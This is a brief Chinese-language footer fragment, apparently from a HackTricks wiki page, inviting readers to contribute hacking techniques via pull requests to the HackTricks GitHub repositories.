* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
{% endhint %}